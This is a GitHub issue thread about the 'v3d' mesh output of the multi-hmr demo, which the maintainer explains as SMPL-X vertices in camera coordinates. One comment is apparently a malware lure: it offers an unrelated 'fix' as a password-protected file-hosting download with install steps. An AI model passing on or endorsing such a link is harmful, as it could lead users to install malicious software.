### ISSUE TITLE
Format of mesh ('v3d')?

### ISSUE THREAD

**Issue by Galaxywalk** [naver/multi-hmr#32]
Hi, thanks for your good job. I tried to use it in my experiments but I cannot understand the format of l_mesh in demo.py. It seems a normalized value between -1 and 1 but I cannot map it into my input figure. I have considered that you clip the figure into 896*896 but I still cannot understand the format of mesh.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by fabienbaradel** [comment]
Hi, the `v3d` correspond to the 3d points of the SMPL-X mesh which is of shape ```10475x3```. To build your mesh for rendering purpose you need to use the faces which are available using the SMPL-X layer [here](https://github.com/naver/multi-hmr/blob/master/demo.py#L131).
So the values are not normalized between -1 and 1 but they corresponds to the 3d location in camera coordinate space.
If you are not familiar with mesh, you can have a look to the [SMPL github repo](https://github.com/vchoutas/smplx).
I hope that this answer helps you,
